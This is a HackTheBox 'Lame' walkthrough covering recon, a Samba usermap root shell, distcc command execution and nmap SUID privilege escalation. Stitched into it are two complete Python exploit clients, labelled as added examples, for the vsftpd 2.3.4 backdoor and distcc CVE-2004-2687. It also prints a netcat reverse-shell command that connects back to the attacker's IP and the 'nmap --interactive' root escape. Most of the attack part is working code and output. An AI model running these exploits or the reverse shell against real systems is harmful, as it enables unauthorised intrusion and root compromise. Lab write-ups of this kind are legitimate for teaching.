HackTheBox - Lame Walkthrough
Jul 10, 2019

I decided to start HackTheBox from the beginning and write up every box as I go. The first one in the list is Lame, an easy box based on Metasploitable. I hope these posts can help someone other than me, but in the end I'm doing them for learning/note taking - if you have any complaints/suggestions/questions, hit me up on Twitter.
1. Recon and Information gathering
Nmap
root@warmachine:/hackthebox/lame# nmap -sV -sC 10.10.10.3 -oN base_tcp.nmap
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-10 21:14 EEST
Nmap scan report for 10.10.10.3
Host is up (0.044s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.25
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -2d23h01m54s, deviation: 0s, median: -2d23h01m54s
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| NetBIOS computer name:
| Workgroup: WORKGROUP\x00
|_ System time: 2019-07-07T11:12:55-04:00
|_smb2-time: Protocol negotiation failed (SMB2)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.99 seconds
SERVICES
FTP
With my first look at the nmap results I notice the vsftpd version, 2.3.4, and I know I have "something" here :) A quick search with searchsploit yields the result I remember:
root@warmachine:/hackthebox/lame# searchsploit vsftpd
------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------------
vsftpd 2.0.5 - 'CWD' (Authenticated) Remote Memory Consumption | exploits/linux/dos/5814.pl
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1) | exploits/windows/dos/31818.sh
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (2) | exploits/windows/dos/31819.pl
vsftpd 2.3.2 - Denial of Service | exploits/linux/dos/16270.c
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) | exploits/unix/remote/17491.rb
------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------------
I’ll leave this for a minute and check the other services.
SMB
As nmap tells me, the SMB ports 139 and 445 are open. I'll take a look at those after playing with the FTP service.
2. Gaining foothold/Exploiting
Now, the FTP service. That version of vsftpd is the one that was shipped with a backdoor - https://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html. Let's copy the script from the searchsploit result to my working directory:
root@warmachine:/hackthebox/lame# searchsploit -m exploits/unix/remote/17491.rb
Exploit: vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)
URL: https://www.exploit-db.com/exploits/17491
Path: /usr/share/exploitdb/exploits/unix/remote/17491.rb
File Type: Ruby script, ASCII text, with CRLF line terminators
Copied to: /hackthebox/lame/17491.rb
The script is a Metasploit module, but since I have some far-away plans of taking the OSCP I'll do my best to skip using it (or at least skip it as a primary tool…). Looking through the module, it looks like I have to send a smiley face, ":)", as part of the USER name; once that login is processed the backdoor opens a shell on TCP 6200. And… uh-oh… the module gives up when the server answers the USER command with a 530 (it treats that as an anonymous-only server, where the login path holding the ":)" check is never reached), and even if the trigger goes through, the shell on 6200 still has to be reachable from my side. Guess I can't exploit that now. Also there are no files/folders in the anonymous FTP - what a let down :/. So I'll check the SMB then:
root@warmachine:/hackthebox/lame# smbclient -L 10.10.10.3
Enter WORKGROUP\root's password:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
tmp Disk oh noes!
opt Disk
IPC$ IPC IPC Service (lame server (Samba 3.0.20-Debian))
ADMIN$ IPC IPC Service (lame server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP LAME
Mm, now I have something more interesting. Let's check my permissions:
root@warmachine:/hackthebox/lame# smbmap -H 10.10.10.3
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.3...
[+] IP: 10.10.10.3:445 Name: 10.10.10.3
Disk Permissions
---- -----------
print$ NO ACCESS
tmp READ, WRITE
opt NO ACCESS
IPC$ NO ACCESS
ADMIN$ NO ACCESS
Oh, look at that - I can read/write to tmp… but not that useful at the moment
root@warmachine:/hackthebox/lame# smbclient //10.10.10.3\\tmp
Enter WORKGROUP\root's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Jul 7 18:48:37 2019
.. DR 0 Sun May 20 21:36:12 2012
.ICE-unix DH 0 Sun Jul 7 18:10:18 2019
.X11-unix DH 0 Sun Jul 7 18:10:42 2019
.X0-lock HR 11 Sun Jul 7 18:10:42 2019
5144.jsvc_up R 0 Sun Jul 7 18:11:24 2019
7282168 blocks of size 1024. 5678792 blocks available
smb: \>
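Coming back to the vsftpd backdoor from the FTP section before moving on: this is what the Metasploit module does on the wire, as a small stand-alone client. It is an added example written for this page, not the page's own code and not the exploit-db module. It assumes the lab address 10.10.10.3 from the scan, that the ":)" trigger behaves as described above (USER gets a 331, PASS hangs while the backdoor starts listening), and that TCP 6200 is reachable from the attacking host; if 6200 is filtered the trigger still fires but the shell can never be collected.

```python
"""Manual trigger for the vsftpd 2.3.4 backdoor, no Metasploit involved.

Added example for this walkthrough, not the page's or exploit-db's code.
Assumptions: lab address 10.10.10.3 and a reachable TCP 6200.
"""
import re
import socket
import time
from typing import Optional

BACKDOOR_PORT = 6200


def ftp_reply_code(reply: bytes) -> Optional[int]:
    """Numeric code of an FTP reply line such as b'331 Please specify...'."""
    m = re.match(rb"(\d{3})[ -]", reply)
    return int(m.group(1)) if m else None


def build_trigger(prefix: str = "x") -> bytes:
    """USER line that reaches the backdoor: any name containing ':)'."""
    if "\r" in prefix or "\n" in prefix:
        raise ValueError("prefix must not contain CR/LF")
    return f"USER {prefix}:)\r\n".encode()


def is_anonymous_only(user_reply: bytes) -> bool:
    """530 straight after USER: local logins are off, so the login code that
    holds the ':)' check never runs (the Metasploit module stops here too)."""
    return ftp_reply_code(user_reply) == 530


def shell_command(host: str, cmd: str, timeout: float = 10.0) -> Optional[bytes]:
    """One command through the /bin/sh on 6200; None if nothing is listening.

    The backdoor execs sh on the first accepted connection, so never probe
    the port with a separate connect: the probe would be the one that gets
    the shell, and closing it would throw the shell away."""
    try:
        sh = socket.create_connection((host, BACKDOOR_PORT), timeout=timeout)
    except OSError:
        return None
    with sh:
        sh.sendall(cmd.encode() + b"\n")
        sh.shutdown(socket.SHUT_WR)  # EOF on stdin makes sh exit after cmd
        out = b""
        while True:
            chunk = sh.recv(4096)
            if not chunk:
                break
            out += chunk
        return out


def trigger_and_run(host: str, cmd: str, timeout: float = 10.0) -> bytes:
    """USER x:) / PASS x on port 21, then talk to the shell on 6200.

    The control connection stays open for the whole exchange, as the
    Metasploit module keeps it open too."""
    already = shell_command(host, cmd, timeout)  # someone triggered it before
    if already is not None:
        return already
    with socket.create_connection((host, 21), timeout=timeout) as ctl:
        if ftp_reply_code(ctl.recv(1024)) != 220:
            raise RuntimeError("no FTP banner")
        ctl.sendall(build_trigger())
        reply = ctl.recv(1024)
        if is_anonymous_only(reply):
            raise RuntimeError("anonymous-only server, backdoor unreachable")
        # PASS is what gets the login processed; the server never answers it
        # because the backdoor blocks in accept() from that point on.
        ctl.sendall(b"PASS x\r\n")
        for _ in range(5):  # give the listener a moment to come up
            out = shell_command(host, cmd, timeout)
            if out is not None:
                return out
            time.sleep(1)
    raise RuntimeError("trigger sent but nothing listening on 6200")


if __name__ == "__main__":
    print(trigger_and_run("10.10.10.3", "id").decode(errors="replace"))
```

The 530 check and the "is 6200 already open" check are the two failure modes the module handles; the only thing the module does not tell you is that a filtered 6200 looks exactly like a trigger that never fired, so a quick look at the firewall picture from the full port scan is worth more than retrying.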
Searching for Samba 3.0.20 I get an interesting result - CVE-2007-2447, Samba "username map script" command execution: when the `username map script` option is set, smbd passes the user name from the session setup to that script through a shell without sanitising it, so shell metacharacters (backticks) in the user name run as root. And since I want to skip Metasploit, some googling leads me to this script, which does the same thing with pysmb: https://gist.githubusercontent.com/joenorton8014/19aaa00e0088738fc429cff2669b9851/raw/6e1ae37e0061be103fd733b16266d26379a7f4ba/samba-usermap-exploit.py
Generating a new payload for my host and substituting it in the script, installing pysmb with pip, and executing… BAM! Got root..
Ncat: Connection from 10.10.10.3:55941.
id
uid=0(root) gid=0(root)
That was easy… I'll pretend I don't have this shell and check if there's something more.
Let’s enumerate some more and check all ports
root@warmachine:/hackthebox/lame# nmap -p- 10.10.10.3 -oN all_tcp.nmap
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-10 22:53 EEST
Nmap scan report for 10.10.10.3
Host is up (0.036s latency).
Not shown: 65530 filtered ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3632/tcp open distccd
Uh-oh, distccd… Now that's interesting. Googling around I found this: https://nmap.org/nsedoc/scripts/distcc-cve2004-2687.html and the NSE script itself https://svn.nmap.org/nmap/scripts/distcc-cve2004-2687.nse :
root@warmachine:/hackthebox/lame# wget https://svn.nmap.org/nmap/scripts/distcc-cve2004-2687.nse -O /usr/share/nmap/scripts/distcc-exec.nse
--2019-07-10 23:05:45-- https://svn.nmap.org/nmap/scripts/distcc-cve2004-2687.nse
Resolving svn.nmap.org (svn.nmap.org)... 45.33.49.119, 2600:3c01::f03c:91ff:fe98:ff4e
Connecting to svn.nmap.org (svn.nmap.org)|45.33.49.119|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3519 (3.4K) [text/plain]
Saving to: ‘/usr/share/nmap/scripts/distcc-exec.nse’
/usr/share/nmap/scripts/distcc-exec.nse 100%[========================================================================================>] 3.44K --.-KB/s in 0s
2019-07-10 23:05:46 (186 MB/s) - ‘/usr/share/nmap/scripts/distcc-exec.nse’ saved [3519/3519]
root@warmachine:/hackthebox/lame#
root@warmachine:/hackthebox/lame# nmap -p 3632 10.10.10.3 --script distcc-exec --script-args="distcc-exec.cmd='id'"
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-10 23:06 EEST
Nmap scan report for 10.10.10.3
Host is up (0.040s latency).
PORT STATE SERVICE
3632/tcp open distccd
| distcc-exec:
| VULNERABLE:
| distcc Daemon Command Execution
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2004-2687
| Risk factor: High CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
| Allows executing of arbitrary commands on systems running distccd 3.1 and
| earlier. The vulnerability is the consequence of weak service configuration.
|
| Disclosure date: 2002-02-01
| Extra information:
|
| uid=1(daemon) gid=1(daemon) groups=1(daemon)
|
| References:
| https://distcc.github.io/security.html
| https://nvd.nist.gov/vuln/detail/CVE-2004-2687
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687
Nmap done: 1 IP address (1 host up) scanned in 0.52 seconds
Finally - let's get a shell:
root@warmachine:/hackthebox/lame# nmap -p 3632 10.10.10.3 --script distcc-exec --script-args="distcc-exec.cmd='/bin/nc 10.10.14.25 4747 -e /bin/sh'"
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-10 23:27 EEST
root@warmachine:/hackthebox/lame# nc -lvnp 4747
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::4747
Ncat: Listening on 0.0.0.0:4747
Ncat: Connection from 10.10.10.3.
Ncat: Connection from 10.10.10.3:34633.
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
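What the NSE script does on the wire, as a small stand-alone client with a parser for the reply: this is an added example written for this page, not the nmap script and not the page's own code. It assumes the distcc v1 request layout (4-byte token, 8 hex digits, optional payload), the lab address 10.10.10.3 from the scan, and a constructed sample reply used for the offline check; the argv shape (sh -c CMD # -c main.c -o main.o) is the one the public exploits use so that distccd's argument scanner finds a -c input and a -o output to rewrite.

```python
"""Stand-alone client for CVE-2004-2687: a distccd with no client
restriction compiles with whatever 'compiler' and arguments it is handed.

Added example, not the nmap script's or the page's code.  Assumptions:
distcc v1 framing, lab address 10.10.10.3, constructed SAMPLE_REPLY.
"""
import socket
from typing import Any, Dict, List


def encode_request(cmd: str, source: bytes = b"int main(void){return 0;}\n") -> bytes:
    """Compile job whose compiler is 'sh -c CMD'.

    The tokens after the command keep distccd's argument scanner happy (it
    wants '-c file' and '-o file' to rewrite to temp paths); to sh they are
    only positional parameters sitting behind the command."""
    argv: List[str] = ["sh", "-c", cmd, "#", "-c", "main.c", "-o", "main.o"]
    req = b"DIST00000001" + b"ARGC%08x" % len(argv)
    for arg in argv:
        raw = arg.encode()
        req += b"ARGV%08x" % len(raw) + raw
    # DOTI carries the "preprocessed source"; its content is irrelevant here.
    return req + b"DOTI%08x" % len(source) + source


def parse_response(data: bytes) -> Dict[str, Any]:
    """Walk the token stream: DONE/STAT carry a number only, SERR/SOUT/DOTO
    carry a length followed by that many payload bytes."""
    out: Dict[str, Any] = {"version": None, "stat": None,
                           "serr": b"", "sout": b"", "doto": b""}
    i = 0
    while i + 12 <= len(data):
        token = data[i:i + 4].decode("ascii")
        value = int(data[i + 4:i + 12], 16)
        i += 12
        if token == "DONE":
            out["version"] = value
        elif token == "STAT":
            out["stat"] = value
        elif token in ("SERR", "SOUT", "DOTO"):
            if i + value > len(data):
                raise ValueError(f"truncated {token} payload")
            out[token.lower()] = data[i:i + value]
            i += value
        else:
            raise ValueError(f"unexpected token {token!r} at offset {i - 12}")
    return out


def command_output(resp: Dict[str, Any]) -> bytes:
    """distccd relays the compiler's stdout as SOUT and its stderr as SERR."""
    return resp["sout"] + resp["serr"]


def run_command(host: str, cmd: str, port: int = 3632,
                timeout: float = 10.0) -> Dict[str, Any]:
    """Send one job and parse what comes back (distccd closes when done)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(encode_request(cmd))
        buf = b""
        try:
            while True:
                chunk = s.recv(4096)
                if not chunk:
                    break
                buf += chunk
        except socket.timeout:
            pass  # keep whatever arrived; parse_response flags truncation
    return parse_response(buf)


# Constructed sample of a vulnerable distccd's reply to 'id' (not captured).
SAMPLE_REPLY = (b"DONE00000001STAT00000000SERR00000000"
                b"SOUT0000000euid=1(daemon)\nDOTO00000000")

if __name__ == "__main__":
    print(command_output(parse_response(SAMPLE_REPLY)).decode())
    print(command_output(run_command("10.10.10.3", "id")).decode(errors="replace"))
```

The fix on the server side is configuration, not code: distccd is meant to be started with `--allow` for the networks that may submit jobs (or behind an SSH transport), which is exactly the "weak service configuration" the NSE output refers to.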
3. Enumerating the system
First things first: python -c 'import pty;pty.spawn("/bin/bash")' to upgrade the shell, and then LinEnum.sh. Interesting stuff:
[+] Possibly interesting SUID files:
-rwsr-xr-x 1 root root 780676 Apr 8 2008 /usr/bin/nmap
-rwsr-xr-x 1 root root 46084 Mar 31 2008 /usr/bin/mtr
Whoa! That's almost like Metasploitable :D Oh, wait…
daemon@lame:/tmp$ cat /root/.ssh/authorized_keys
cat /root/.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable
Not "like" - judging by the msfadmin@metasploitable key in root's authorized_keys, it is, I guess…
I’ll play with the SUIDs - with the help of gtfobins - https://gtfobins.github.io
nmap SUID
daemon@lame:/tmp$ nmap --interactive
nmap --interactive
Starting Nmap V. 4.53 ( http://insecure.org )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
sh-3.2# id
id
uid=1(daemon) gid=1(daemon) euid=0(root) groups=1(daemon)
sh-3.2# cat /root/root.txt
cat /root/root.txt
<...>
sh-3.2# cat /home/makis/user.txt
cat /home/makis/user.txt
<...>
For some reason I couldn't make the mtr SUID work… it errors out? :/
That's pretty much it… a lot of vulnerabilities and misconfigurations. LinEnum.sh showed more interesting stuff, but looking at it I think those were "patched" so that the machine isn't quite that vulnerable.